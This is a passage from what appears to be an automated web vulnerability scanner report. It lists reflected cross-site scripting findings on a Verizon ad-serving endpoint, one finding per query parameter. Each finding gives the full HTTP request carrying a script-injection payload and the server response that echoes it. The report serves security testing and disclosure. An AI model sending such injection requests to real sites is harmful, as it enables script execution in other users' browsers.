P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1461
Content-Type: text/html
Cache-Control: private
Content-Length: 1461

<IFRAME SRC="http://ad.doubleclick.net/adi/N3285.verizon/B2343920.19;sz=300x250;click0=http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/dd200"a="b"4f3fa442ed1/L24/276647423/UNKNOWN/VDSL/LMB_NAF_RON_300_2010_11_01/LowerMyBills_NAF_vznews_300_2009-06.html/726e6f58326b7a6e4b45494141693565?;ord=276647423?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPAC
...[SNIP]...

2.574. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [audio_conf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497e1"><script>alert(1)</script>829630d20ba was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=497e1"><script>alert(1)</script>829630d20ba&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:55:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=497e1"><script>alert(1)</script>829630d20ba&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.575. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [bbaw parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c9e"><script>alert(1)</script>de0ed8fa512 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=38c9e"><script>alert(1)</script>de0ed8fa512&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:57:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=38c9e"><script>alert(1)</script>de0ed8fa512&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.576. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [connex parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9336"><script>alert(1)</script>06f4f26e350 was submitted in the connex parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=e9336"><script>alert(1)</script>06f4f26e350&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:51:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
755/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=e9336"><script>alert(1)</script>06f4f26e350&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg
...[SNIP]...

2.577. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiostvown parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dde95"><script>alert(1)</script>a822f79e323 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=dde95"><script>alert(1)</script>a822f79e323&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:52:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
formA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=dde95"><script>alert(1)</script>a822f79e323&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.578. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [fiosvoice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37937"><script>alert(1)</script>e02e08d3502 was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=37937"><script>alert(1)</script>e02e08d3502&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=37937"><script>alert(1)</script>e02e08d3502&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.579. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [msp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b765b"><script>alert(1)</script>85d8bcdeb44 was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=b765b"><script>alert(1)</script>85d8bcdeb44&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
6e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=b765b"><script>alert(1)</script>85d8bcdeb44&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.580. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebecc"><script>alert(1)</script>f8e5a220c07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&ebecc"><script>alert(1)</script>f8e5a220c07=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:59:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1366
Content-Type: text/html
Cache-Control: private
Content-Length: 1366

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&ebecc"><script>alert(1)</script>f8e5a220c07=1" target="_top">
...[SNIP]...

2.581. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [npa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dcf3"><script>alert(1)</script>2819918f614 was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=2dcf3"><script>alert(1)</script>2819918f614&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:53:47 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
racking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=2dcf3"><script>alert(1)</script>2819918f614&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.582. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [nxx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa3fa"><script>alert(1)</script>c8d299f1c04 was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=fa3fa"><script>alert(1)</script>c8d299f1c04&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:54:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ng/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=fa3fa"><script>alert(1)</script>c8d299f1c04&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.583. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [online_backup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dcdc"><script>alert(1)</script>690eb2ffc82 was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=4dcdc"><script>alert(1)</script>690eb2ffc82&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 01:56:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=4dcdc"><script>alert(1)</script>690eb2ffc82&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.584. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/9376@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 476c8"><script>alert(1)</script>1cd684a7591 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

